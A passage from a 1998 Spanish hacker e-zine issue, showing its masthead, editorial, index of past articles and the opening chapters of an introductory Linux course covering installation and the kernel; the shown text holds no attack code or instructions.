home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 285.3 KB | 7,261 lines |
-
- ╔────────────────────────────╗
- │ ┌──────┐ │
- │ │██████│ │
- │ ┌──────┤██┌───┘ │
- │ ┌──────┤██████│██└─┐ │
- │ │██████├─┐██┌─┤████│ │
- │ └─┐██┌─┴┐│██│J│██┌─┘ │
- │ ┌──┐│██│██└┘██│J│██│ │
- │ │██└┘██│██████│F├──┘ │
- │ │██████├──────┴─┘ │
- │ └──────┘ │
- │ H A C K E R S T E A M │
- │ J O U R N A L │
- ╠────────────────────────────╣
- │ VOL. #2, Nº6, 1998. │
- ╚────────────────────────────╝
-
-
- "The most important design issue...
-
- is the fact that Linux is supposed to be fun..."
-
- Linus Torvalds.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
- de la informacion aqui expuesta y tampoco tiene que estar
- de acuerdo con lo que sus colaboradores opinen.
- Tampoco esperamos que la gente use la informacion aqui expuesta
- para hacer daño ya que tan solo es con fines didacticos.
-
- Recomendado el uso del editor del MS-DOS.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- #CURRENT MEMBERS :
-
- - CONDE VAMPIRO - CODER H/P/V EDITOR
- - MAC CRACK - CODER C WEBMASTER
- - Mr ELEKTRO - H/P ADMIN
- - SILENT MOTION - CODER H/P ADMIN
- - JUMPKNOWN - CODER H/P/V/C
- - TASSLEHOFF - CODER H CO-WEBMASTER
-
- #WEB OFICIAL :
-
- - http://www.angelfire.com/mi/JJFHackers
- - http://jjfhackers.home.ml.org
- - http://jjfhackers.hypermart.net
-
- #E-MAIL OFICIAL :
-
- - jjf_team@usa.net
-
- #LLAVE PGP OFICIAL :
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.6.3ia
-
- mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
- BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
- ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
- tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
- 9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
- IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
- NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
- =Wu00
- -----END PGP PUBLIC KEY BLOCK-----
-
- #DISTRIBUIDORES OFICIALES DEL E-ZINE :
-
- - http://wakanda.islatortuga.com
- - http://underhack.islatortuga.com
- - http://www.redestb.es/~cheroky-1
- - http://members.xoom.com/baron_rojo/
- - http://members.xoom.com/rifoxxx
- - http://www.geocities.com/Colosseum/Sideline/9497/
-
- #MIEMBRO OFICIAL (web ring) DE :
-
- - Black Angels
- - Spanish Underground Web Ring
-
- #COLABORADORES CON ESTE NUMERO :
-
- - LeTaL
- - CORE SDI S.A.
- - \Wend|g0
- - ZeD (HaCk`S-wEb-RiNg)
-
- #SALUDOS :
-
- - Metalslug (Wakanda) - NeonSurge (Rhino9)
- - Schoddy Guy (Underhack) - L0pth
- - Cheroky - Ivan Arce (CORE SDI S.A.)
- - Silicon Dragon - Proyecto R
- - Paseante (SET)
- - Dr Slump (oioio)
-
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
-
- - INDICE.
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * INDICE DEL VOLUME Nº1 .................... J.J.F. / HACKERS TEAM
- * CURSO LINUX .............................. LETAL.
- * HACK BASICO .............................. \WEND|G0.
- * CURSO DE HACK VI ......................... CONDE VAMPIRO.
- * CLONANDO MOVILES DEL CCC ................. J.J.F. / HACKERS TEAM
- * ¿QUE SE PUEDE HACER EN EL IRC? ........... ZED.
- * PHREACKING PARA NOVATOS .................. ZED.
- * COMO TRUCAR EL GⁿINDOWS95 ................ ZED.
- * ADVERTENCIA DE SEGURIDAD ................. CORE SDI S.A.
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- -------------
- │ EDITORIAL │
- -------------
-
- Pues quien lo diria, que este ezine comienza su segundo volumen y
- por supuesto nos anima a seguir mejorando no solo el ezine, si no tambien
- el web y muchas mas cosas que ya os iremos contando, que a lo largo de
- este año seran muchas. Destacar que empezamos el segundo volumen con muy
- buena calidad. Una de las cosas a destacar es la bienvenida de nuevos
- miembros en J.J.F. / HACKERS TEAM, que son los siguientes : Mr. Elektro,
- Silent Motion, JumpKnown y Tasslehoff.
-
- Una pequeña reseña, ya que tenemos mas distribuidores oficiales, en el
- cual podreis encontrar este ezine y tambien otros, los url's son los
- siguientes: http://members.xoom.com/rifoxxx y
- http://www.geocities.com/Colosseum/Sideline/9497/
-
- Bueno, ya se acabo el verano, para algunos mal y para otros bien,
- como siempre ahi toda clase de opiniones. Desde aqui quiero hacer una
- pequeña reseña, ¿ me pregunto donde esta toda esa gente que decia que
- quiere colaborar con articulos. ? Ya que todavia no hemos visto nada de
- nada, a ver si para futuros numeros vemos vuestros nicks por aqui :)
- Como ya hemos dicho muchas veces puedes escribir sobre H/C/P/V, seguridad
- o de cualquier cosa que creas interesante. Por supuesto tambien nos
- gustaria los puntos de vista de los administradores, agentes de la autoridad
- y de las grandes corporaciones. Este es un ezine para todos los gustos.
- Y POR FAVOR!!!!!!!! Si quieres escribir no envies un mail antes dicendo:
- "Hola, os interesa un articulo de ...", lo que tienes que hacer es
- ESCRIBIRLO y DESPUES NOS LO ENVIAS, asi de simple, okis!!!!
-
- Por una vez en la vida sabemos cuando saldra el numero 7 :), por
- eso avisamos de antemano para que envieis vuestros articulos. El numero 7
- esta fijado para principios de diciembre, por lo que teneis tiempo de
- sobra. ¿ Porque a principios de diciembre ?, la respuesta en el numero 7 :)
-
- Hemos visto que en muchos sitios, tanto en web's como en articulos,
- la gente no nos nombra correctamente y eso ahi que corregirlo, por lo que
- hacemos hincapie en que para referiros al grupo lo hagais de la siguiente
- manera : J.J.F. / HACKERS TEAM, y para referiros al ezine, pues de esta
- otra: J.J.F. / HACKERS TEAM JOURNAL. Que son las formas correctas :)
-
- En este numero hemos sufrido un pequeño retraso debido a varios
- factores :) tambien decir que ayer fue el cumple de Conde Vampiro (21/9)
- y el jueves es el de Tasslehoff (24/9) por lo que este semana estamos
- de fiesta :))) Dentro de una semana, podreis encontrar en nuestro website
- varias fotos de nuestras aventuras nocturnas que seguro que os encantaran,
- por otro lado, AVISO A LOS DISTRUIBUIDORES OFICIALES: decir que hemos
- puesto 2 logos que cualquiera que distribuya nuestro ezine le rogamos
- que ponga en su website y ademas nos envie su url para ponerlo en el
- ezine.
-
- Desde aqui, - J.J.F. / HACKERS TEAM -, mandamos un apoyo a SET por los
- problemas sufridos, referente a unos logs de un determinado kanal de IRC
- de la red Hispanos y que sigan tirando para adelante :)
-
- Desde aqui damos las gracias al señor Ivan Arce, por dejanos
- publicar los avisos de la empresa CORE, al igual que tambien queremos
- anunciaros, para los que no lo sepan, la mejor lista de seguridad en
- castellano que se puede encontrar, la cual el señor Arce es el moderador y
- para suscribirse haced lo siguiente, enviar mail a majordomo@secnet.com
- con el texto "subscribe seg-l [su-email]" en el cuerpo del mensaje y ya
- estareis suscritos.
-
- Tambien damos las gracias a los señores Sergi Bueno y Javier Pedreira
- "Wicho" de las revistas EN LA RED e IWORLD, respectivamente, por dejarnos
- expresar nuestras opiniones y poder colaborar. Durante este año hemos
- salido en las siguientes revistas :
-
- - EN LA RED, 2.03.
-
- - IWORLD, Año II, Numero 7. Julio-Agosto 1998.
-
- - Jumping, Año IV, 2 Epoca, Nª20, Julio-Agosto 1998.
-
- A todos ellos en gran o menor medida gracias.
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- █═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═█
- │ ║
- ║ INDICE DEL VOLUME Nº1 │
- │ ║
- ║ - J.J.F. / HACKERS TEAM JOURNAL - │
- │ ║
- █─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─█
-
- Pues aqui os recordamos los articulos que han pasado por el Primer
- Volumen del - J.J.F. / HACKERS TEAM JOURNAL -. A la vez que tambien damos
- las gracias a todas aquellas personas que han hecho posible este ezine.
-
- -> Nº1
-
- TITULO AUTOR
- ------------________________________________---------------
-
- * EDITORIAL ________________________________ J.J.F. / HACKERS TEAM
- * TECNICAS HACKER __________________________ VANDALS.
- * CURSO DE HACK I __________________________ CONDE VAMPIRO.
- * STACK OVERFLOW EXPLOiTS __________________ IPgh0st.
- * CONFERENCIA DE LA GC EN EL SIMO __________ NOBODY.
- * TEST HACKER ______________________________ MAC CRACK BISHOP.
- * NOTICIAS UNDERGROUND _____________________ CONDE VAMPIRO.
-
- -> Nº2
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * IP-SPOOFING DEMISTIFICADO ................ IPgh0st.
- * LAND ATTACK .............................. NOBODY.
- * CURSO DE HACK II ......................... CONDE VAMPIRO.
- * MOVIL DEFECTUOSO ERICSSON GA-628 ......... JSR.
- * INTRODUCCION AL HACK ..................... VIRUX.
- * HACKERS HALL OF FAME ..................... BISHO.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- -> Nº3
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * MIEDO A LOS ARTICULOS: NO, GRACIAS ....... CONDE VAMPIRO.
- * QUE ES UN HACKER Y QUE ES UN CRACKER ..... BISHO.
- * LOS OUTDIALS EN INTERNET ................. NOBODY.
- * UN LOG DE UN SERVIDOR .................... ANONIMO.
- * CURSO DE HACK III ........................ CONDE VAMPIRO.
- * USO DE SAMBA EN LINUX/UNIX COMO
- SUSTITUTO DEL NBTSTAT .................... ENIF.
- * ESTADISTICA DE LOS HACKERS EN 1997 ....... J.J.F. / HACKERS TEAM
- * DOCUMENTO SOBRE LOS PERMISOS DE ARCHIVOS
- Y DIRECTORIOS PARA SISTEMAS UNIX ......... KOJI.
- * INTRODUCCION AL HACKING v2.0 I ........... DAEMON.
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- -> Nº4
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * HACK WITH JAVA ........................... NOBODY.
- * UN POKILLO DE PHREAKING .................. DRSLUMP.
- * CURSO DE HACK IV ......................... CONDE VAMPIRO.
- * COMO HACKEAR UN TAMATGOTCHI .............. BISHO.
- * MANIFIESTO DE UN HACKER NOVATO ........... SILICON DRAGON.
- * INTRODUCCION AL HACKING v2.0 II .......... DAEMON.
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- -> Nº5
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
- * HERRAMIENTAS PARA USUARIOS DE LINUX
- (PARANOICOS?) ............................ CUBIKICE.
- * CURSO DE HACK V .......................... CONDE VAMPIRO.
- * COMO CRACKEAR NORTON CRASHGUARD
- DELUXE 3.0 ............................... ESTADO PORCINO.
- * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- Y ahora un saludo a las siguientes personas que de alguna forma han
- participado con - J.J.F. / HACKERS TEAM -.
-
- -> Saludos :
-
- - VANDALS
- - IPgh0st (Underhack)
- - NOBODY
- - Virux (@pOkalypSYS)
- - Bisho
- - Jsr
- - Metalslug (Wakanda)
- - Koji
- - Cesar
- - Enif (Oioio)
- - Daemon
- - Schoddy Guy (Underhack)
- - DrSlump (OiOiO's Band)
- - Silicon Dragon
- - Cheroky
- - CubikIce
- - Estado Porcino (WKT)
- - Paseante (SET)
- - Profesor Falken (SET)
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ---------------
- -< CURSO LINUX >-
- ---------------
-
- INDICE TEMATICO
- ---------------
-
- #CAPITULO I: INTRODUCCION.
- Linux, la mejor alternativa, caracteristicas.
-
- #CAPITULO II : INSTALACION.
- Requerimientos para la instalacion, Preparacion, Instalacion.
-
- #CAPITULO III: KERNEL
- ¿Que es el Kernel, ¿Para que recompilarlo?, ¿Que se necesita?,
- Configuracion, Makefile, Compilacion, Instalacion.
-
- #CAPITULO IV: USO
- Conceptos basicos preliminares, Shells, Directorios, comandos basicos.
-
- #CAPITULO V: TAREAS Y PROCESOS
- Control de Tareas, Tareas y procesos, Primer plano y Segundo plano,
- Envio a segundo plano y eliminacion procesos, Detencion o parada y
- relanzamiento de tareas.
-
- #CAPITULO VI: USUARIOS Administracion de Usuarios. Como agregar un usuario,
- Como borrar un usuario.
-
- #CAPITULO VII: SEGURIDAD BASICA
- Permisos de Ficheros, Conceptos de permisos de ficheros, Interpretando los
- permisos de ficheros, Dependencias, Cambiando permisos, Grupos,
-
- #GLOSARIO.
-
- #Capitulo I
-
- Linux, la mejor alternativa.
-
- Vamos a hablar un poco acerca de Sistemas Operativos. Mucho Usuarios
- especialmente los novatos creen que el mundo esta hecho solo de Windows 95
- y que el DOS fue su antepasado antediluviano, en realidad Windows 95 es una
- nueva cara bonita del DOS. Pero la realidad nos dice que no existe un solo
- S.O. tenemos varias decenas de ellos, por ejemplo antes de DOS fue CPM del
- que heredamos entre otras cosas los archivos .COM, también existen SPARC,
- OS400, PICK, SYSTEM, OASIS, y una gran variedad de derivados de UNIX, entre
- ellos SOLARIS, AIX, XENIX, USB, SUN OS y LINUX.
- La aparicion de W95 a creado adeptos y adversos, pero tambien a dado
- origen a un debate acerca de los sistemas operativos que creo le hace
- mucho bien a la informatica.
- Para contribuir con este debate imaginemonos el Sistema Operativo
- ideal. Seguramente no todos estaremos de acuerdo en todas las sus
- caracteristicas pero busquemos por lo menos diez puntos en comun.
-
- 1. CODIGO: Si nuestra PC actualmente tiene un microprocesador de 32
- bits, el Sistema deber ser "completamente" de 32 bits. Es mas si en el
- futuro tenemos PCs con procesadores de 64 bits, tambien el S.O. deber
- estar compilado en 64 bits. Mas aun, seria mejor que el sistema operativo
- se provea con sus fuentes en el lenguaje mas portable de cuantos existen
- asi lo podemos compilar en la maquina que se nos antoje.
-
- 2. RED: Actualmente se impone cada vez con mayor firmeza el uso de
- redes ya sean locales, Intranets e Internet. De manera que nuestro sistema
- operativo deber estar concebido como de red desde sus origenes. Existen
- muchos sistemas de red, debemos entonces pensar cual es la mejor opcion
- teniendo en cuanta varios factores, la popularidad, la trayectoria, la
- compatibilidad, la fiabilidad, etc. Tenemos que tener en cuenta tambien
- cual es la escala mundial el estandar en Internet. La respuesta es una
- sola, UNIX. Asi que nuestro S.O. deber estar basado en UNIX.
-
- 3. INTEFRCACE CON EL USUARIO: Con la aparicion de las MAC, se impuso
- un nuevo estandar que luego fue incorporado por casi todos los S.O. Las
- Interfaces Graficas. De manera que nuestro S.O. tiene que tener una. Es mas
- seria mejor que tenga muchas y que el usuario pueda elegir si quiere que
- esta se vea y comporte como Win95, como Solaris, como las no tan populares
- NEXT, una propia de UNIX como ser MOTIFF, o de muchas otras formas algunas
- totalmente ineditas y originales.
-
- 4. MULTITAREA: El cerebro del hombre es multitarea por naturaleza,
- asi que la principal extension artificial del mismo (la PC) deber tener un
- sistema operativo multitarea. Pero multitarea real, de tipo cooperativo,
- que garantice la posibilidad de ejecucion de todas las aplicaciones
- activas.
-
- 5. MULTIUSUARIO: La PC no es como un cepillo de dientes de uso
- personal exclusivamente es mas bien como una esponja o cepillo de baño que
- los usan toda la familia de manera que nuestro S.O. ideal deber tener
- capacidad de administrar en forma segura la informacion y aplicaciones de
- cada uno de sus usuarios pudiendo estos tener terminales propias o bien
- usar una sola maquina.
-
- 6. MULTIMEDIA: Nuestro S.O. tendra que soportar todas las
- capacidades multimedia actuales y las que vendran deberan tener una rapida
- asimilacion.
-
- 7. APLICACIONES: Sin una fuerte biblioteca de aplicaciones un S.O.
- esta destinado a perecer. De manera que tendremos que contar con una
- amplisima coleccion de aplicaciones que cubran todos los rubros tales como
- Graficos, Animaciones, Musica, Autoedicion, Procesamiento de textos,
- Gestion administrativa y comercial. No nos olvidemos que como el S.O. de
- suministra con sus fuentes es logico que las aplicaciones tambien lo hagan.
- Como nos basamos en UNIX podremos aprovechar todo el software desarrollado
- para esa plataforma.
-
- 8. OTRAS PLATAFORMAS: Las aplicaciones de otras plataformas tales
- como DOS, Windows o Mac, tienen que correr con emuladores.
-
- 9. DESARROLLO: Es importante que nuestro S.O. tenga un amplio surtido
- de compiladores y librerias, tales como C, C++, PASCAL, BASIC, SMALLTALK,
- EIFFEL, CLIPPER, PERL, FORTRAM, ADA, MODULA 2, ETC.
-
- 10. Y como si todo esto fuera poco pidamos que este soportado por un
- cuerpo de diseñadores y programadores expertos de todo el mundo.
-
- 11. Una de yapa. Que todo absolutamente todo sea GRATIS.
-
- ¿Que tal? No parece un sueño llegar a contar algun dia con un S.O.
- como este. Pero este sueño no es mio, esta quimera le pertenece a un
- finlandes llamado Linus Torvalds y fue precisamente el quien dio los
- primero pasos para hacerlo realidad y asi nace LINUX un S.O. con
- mayusculas que no tiene nada que envidiarle a nadie. Actualmente en
- cualquier casa de venta de Shareware se los puede conseguir al precio que
- solo cubre los gastos de distribucion, por ejemplo tenemos paquetes que
- cuentan con Cuatro o Cinco Distribuciones distintas ademas una completa
- recopilacion de aplicaciones compiladores y librerias a menos de $30 en 6 o
- mas CDs. Tambien esta disponible en Internet en todas sus distribuciones.
- Son de recomendar las paginas WWW.LINUX.ORG, WWW.SUNSITE.UNC.EDU.
-
- Caracteristicas de Linux
-
- * Multitarea real: La multitarea es una virtud codiciada por muchos
- SS.OO. pero lograda por muy pocos, casi todos los SS.OO. que dicen ser
- multitarea lo son a medias ya que usan el concepto de Multitarea
- Cooperativa que cede el microprocesador a otros procesos (aplicaciones)
- solo cuando la aplicacion que se encuentra en primer plano cede el tiempo
- de ejecucion y recursos, en cambio la multitarea preferente que usa Linux
- administra los recursos garantizados que todos los procesos en ejecucion
- incluidos los que corren en background tengan su tiempo de procesador.
-
- * Multiusuario: Dado que como ya vimos Linux es un S.O. multitarea
- es de esperar que tambien sea Multiusuario, es decir que permita que
- personas distintas puedan acceder a su potencial compartiendo los recursos
- que el Administrador del Sistema (SysOp, root) le asigne de acuerdo a su
- jerarquia, dandole ademas a cada uno la privacidad y proteccion necesaria.
- Cada usuario tendra asignado un espacio de disco, aplicaciones, Shells,
- impresoras, etc. lo que junto a la ID (nombre con que el usuario se
- registra) y el password (palabra clave) se denomina Cuentas de Usuarios, en
- el momento en que un usuario desde una terminal remota entra en el sistema
- (login) se dice que comienza una sesion es decir que el micro le garantiza
- recursos y tiempo de microprocesador.
-
- * G.N.U.: Si bien Linus Torvalds es el titular del derecho de autor
- de LINUX, todo, incluido el kernel con sus fuentes estan bajo licencia GNU.
- Esta licencia permite que todos el software desarrollado bajo este concepto
- sea de libre distribucion ofreciendo asi al publico en general software de
- calidad sin que los programadores pierdan sus derechos de autor dejando
- abierta la posibilidad que cualquier otro programador pueda ampliar o
- modificar el programa.
-
- * Librerias Compartidas: Gracias a esta caracteristicas no es
- necesario que las rutinas contenidas en librerias estandar se carguen mas
- de una ves en memoria, ya que cualquier programa que se encuentre en tiempo
- de ejecucion puede acceder a ellas, de esta manera los binarios
- (ejecutables) de Linux son de menor tamaño permitiendo ahorrar espacio en
- disco y memoria.
-
- * Carga por Demanda: En la mayoria de los SS.OO. Cada nuevo proceso
- (aplicación) que se lanza demanda memoria y recursos, pero cuando se
- termina la RAM automaticamente se comienza a hacer uso de la memoria
- virtual, esto no ocurre en Linux puesto que su administracion inteligente
- de memoria pasa a memoria virtual cualquier proceso que se encuentre activo
- pero no en uso garantizando de esta manera RAM para la aplicaciones activas
- y en uso.
-
- * Administracion de Memoria: Todos los procesos tienen garantizada
- una zona protegida de memoria para su ejecucion, sin que el mal
- funcionamiento de una aplicacion cuelgue a todo el equipo.
-
- * Redes TCP/IP: Para conectarse a Internet por ejemplo en Windows
- necesitamos instalar el protocolo TCP/IP. Esto no ocurre en Linux ya que al
- ser TCP un protocolo propio de los sistemas UNIX luego heredado por Linux
- contamos directamente con el en el kernel, incluso la aparición de Java no
- paso inadvertida para Linux de manera que fue inmediatamente absorbida y ya
- se cuenta con soporte tanto para JavaScripts como para applets Java los
- cuales se pueden ejecutar como software nativo al estar incluido en el
- Kernel.
-
- * Aplicaciones: Gracias a la licencia GNU el caudal de aplicaciones
- disponibles para Linux crece a un ritmo vertiginoso especialmente en
- Internet. Podemos decir que existe software para practicamente todas las
- necesidades. La unica limitacion para los usuarios de habla hispana es el
- idioma ya que es muy dificil encontrar software traducido o de origen
- latino para Linux.
-
- * Desarrollo: Linux es un S.O. echo y pensado por programadores para
- programadores, a partir de esto podemos encontrar compiladores o
- interpretes para todos los lenguajes existentes. Algunos ejemplos son los
- siguientes: C (propio de los sistemas UNIX), C++, ADA, PASCAL, PERL,
- MODULA 2, FORTRAN, PHYTON, EIFFEL, BASIC, RPG, SMALLTALK, COBOL, ASSEMBLER,
- OBERON, ETC.
-
- #Capitulo II
-
- Requerimientos de hardware para la instalacion
-
- * CPU: Su computadora debe tener un procesador 386, 486, Pentium, o
- Pentium Pro, o uno de los clones de estos procesadores hechos por
- fabricantes como Cyrix, AMD, TI, IBM, etc. Si su procesador tiene letras
- como "sx", "sl", "slc", etc. despues del numero, como en "386sx", es
- correcto. El sistema no funcionar en un 286 o en procesadores inferiores.
-
- * Bus de E/S: Su computadora debe utilizar el bus ISA, EISA, PCI, o
- VL. El bus VL se conoce tambien como VESA Local Bus o VLB. Las computadoras
- que tienen PCI o VLB generalmente tienen tambien ranuras ISA o EISA.
-
- * RAM y Disco Rigido: Debe tener al menos 4MB de RAM aunque es
- recomendable no menos de 16MB y 40MB de disco duro, pero si usted quiere
- instalarlo todo necesitar 300MB o mas. Las interfaces de disco que emulan
- la interfaz de disco "AT" que se llaman habitualmente MFM, RLL, IDE, o ATA
- estan soportados. Las controladoras de disco SCSI de diversos fabricantes
- estan soportadas.
-
- * Unidad de disquete: Debe tener una unidad de disquete de 1.2MB o
- 1.44MB como unidad a: en el sistema en el que instale Linux. Si tiene tanto
- una unidad de 1.2MB como una de 1.44MB, configure el hardware para que la
- unidad de 1.44MB sea la a:.
-
- * MPC: Como casi todas las distribuciones de Linux vienen en CD-ROM
- necesitaremos una lectora que puede ser IDE, SCSI o con norma propia como
- alguna Creative o Mitusmi.
-
- * Placa de video: Aunque soporta desde una hercules, es recomendable
- usar una placa de video compatible con VGA para el terminal de la consola.
- Practicamente cualquier tarjeta grafica moderna es compatible con VGA. CGA,
- MDA, o HGA pueden funcionar correctamente para texto, pero no funcionar
- con el Xwindows.
-
- * Otro Hardware: Linux soporta una gran variedad de dispositivos como
- son: ratones, impresoras, escaners, modems, tarjetas de red, etc. Sin
- embargo, no se requiere ninguno de estos dispositivos durante la
- instalacion del sistema.
-
- Preparacion:
-
- Antes de comenzar, asegurese de que realiza una copia de seguridad de
- todos los ficheros que hay en su sistema.
-
- Informacion que necesitar :
-
- * Norma del CD-ROM
-
- * Norma del HD
-
- * Especificaciones de su placa de RED (Modelo, Puerto E/S, IRQ)
-
- * Especificaciones de su raton, modem, teclado, zona horaria.
-
- * Frecuencia de barrido horizontal y vertical de su monitor, marca, modelo,
- chipset, RAM y clocks de su placa de video.
-
- * Tipo de servidor grafico segun su placa de video.
-
- * El nombre de la maquina (posiblemente pueda decidir esto por su cuenta).
-
- * El nombre del dominio.
-
- * La direccion IP de su computadora.
-
- * La mascara de red (netmask) que ha de usarse con su red.
-
- * La direccion IP de su red.
-
- * La direccion de difusion (broadcast) que ha de usar en su red.
-
- * La direccion IP de la pasarela (gateway) del sistema por omision hacia la
- cual hay que encaminarse, si su red tiene una pasarela.
-
- * El sistema de su red que debe usar como servidor DNS (`Domain Name
- Server', servidor de nombres de dominio).
-
- Antes de proceder a la instalacion en si, debemos realizar una serie
- de preparativos en nuestro equipo
-
- Preparacion del HD. Si no ha particionado aun su rigido para Linux y
- memoria virtual deber recurrir a la aplicacion shareware FIPS que
- encontrara en cualquier distribucion de Linux, pero antes de usarla
- asegurese de que desfragmento su HD. FIPS le permitir ahora particionar su
- rigido sin que pierda la informacion contenida. Dejaremos de esta manera
- suficientes megas libres de su HD para luego cuando la instalacion lo
- requiera creemos las nuevas particiones con "fdisk", al menos una particion
- Nativa Linux y una particion de intercambio para Linux, la particion de
- intercambio se utilizar para suministrar memoria virtual al sistema, y debe
- tener un tamaño entre 16 y 128 megabytes, dependiendo de cuanto espacio de
- disco tenga usted y cuantos programas grandes quiera ejecutar. Linux no
- usar mas de 128 megabytes de intercambio, asi que no hay razon para hacer
- su particion de intercambio mayor que eso. Se recomienda el uso de una
- particion de intercambio sea cual fuere su RAM, y si su sistema tiene mas
- de 16 megabytes de RAM lo recomendable para un uso promedio del sistema es
- usar la mitad de RAM real como memoria de intercambio. La particion "Linux"
- contendra todos sus ficheros, y puede hacerla de cualquier tamaño entre 40
- megabytes y el tamaño maximo del disco, menos el tamaño de la particion de
- intercambio. Si usted esta familiarizado con Unix o Linux, puede querer
- crear particiones adicionales, por ejemplo, puede crear particiones que
- contendran los sistemas de ficheros /var, y /usr.
-
- Si ya tenemos listo el Disco Rigido y la informacion necesaria
- podemos proceder a la instalacion para ello necesitaremos que la PC
- encendida con DOS y con acceso al CD-ROM con el CD de Red Hat colocado.
-
- 1. Ingresar al directorio DOSUTILS
-
- 2. Ejecutar DOSBOOT.BAT el que se encarga de llamar a "LOADLIN.EXE" que es
- un programa DOS que carga una imagen del Kernel en RAM borrando todo
- vestigio del DOS.
-
- 3. Luego del Booteo, Linux entra automaticamente en una aplicacion que no
- es otra cosa que un asistente para la instalacion. A el deberemos
- contestar las preguntas que nos vaya haciendo de acuerdo a la
- informacion que recopilamos.
-
- 4. Tambien el asistente se encargara de preguntar acerca del nuestro HD
- dandonos la posibilidad de ejecutar "fdisk" a fin de particionar nuestro
- rigido, el uso de fdisk es sencillo a pesar de ser mucho mas poderoso
- que el de DOS y Windows basta decir que con "m" accedemos a la ayuda del
- mismo, lo que hora debemos hacer es: a) crear la particion SWAP con por
- lo menos la mitad de la RAM real, para ello usaremos la opcion "n" y
- luego de decirle el numero de particion le indicaremos el tipo que deber
- ser primaria, con "t" le cambiamos el tipo a "82" que es SWAP, b) crear
- la particion Linux Nativa con "n" nuevamente que tambien deber ser
- primaria el tipo no es necesario cambiarlo por cuanto por defecto crea
- particiones Linux Nativa (tipo 83).
-
- 5. Seleccionar los paquetes que instalaremos, esta es una lista muy
- extensa, son imprescindibles los paquetes base, C, C++, X11, Network,
- pero son necesarios casi todos si lo que pretendemos es un servidor de
- RED, lo superfluo son lo juegos y algunas aplicaciones muy especificas
- como el diseño de circuitos y microprocesadores. Es recomendable
- instalar el Midnight Commander que es un clon de Norton Comander para
- Linux el que se encuentra en el paquete de Shells y el "joe" que es un
- editor de texto similar a WordStar y los IDE de Borland.
-
- 6. Ahora el asistente nos ayudara a instalar "lilo" que es el sistema de
- arranque dual de Linus el que nos permitir la posibilidad de arrancar
- con mas de un S.O.
-
- 7. Si todo salio bien ya hemos terminado con la instalacion Red Hat. Si no
- es asi aqui comienza nuestro penar y lo que les puedo recomendar es
- armarse de paciencia y resarle a nuestro santo favorito que encontremos
- las solucion.
-
- #Capitulo III
-
- KERNEL
-
- ¿Que es el Kernel?
-
- El kernel de UNIX actua como intermediario entre los programas, el
- ordenador y el usuario. En primer lugar, gestiona la memoria de todos los
- programas o procesos, y asegura que se asignen ciclos del microprocesador a
- cada uno. Ademas, proporciona una interfaz portable para que los programas
- hablen facilmente con su hardware.
-
- ¿Para que recompilar el kernel?
-
- Las nuevas versiones normalmente ofrecen la posibilidad de entenderse
- con mas accesorios hardware (o sea, incluyen mas drivers), se ejecutan mas
- rapidamente, son mas estables o corrigen errores de otras versiones. Ademas
- la recompilacion nos permitir adecuar el nucleo a el hardware que tenemos
- pudiendo de esta manera acceder por ejemplo a placas de sonido, video, etc.
- Otra de las ventajas es que podemos seleccionar que sistemas de archivos
- vamos a necesitar por ejemplo en mi caso unicamente accedo a sistemas Vfat
- de W95, MS-DOS, ISO9660, Minix y Ext2fs, de manera que no ocupo
- innecesariamente recursos al incluir sistemas de archivos por ejemplo para
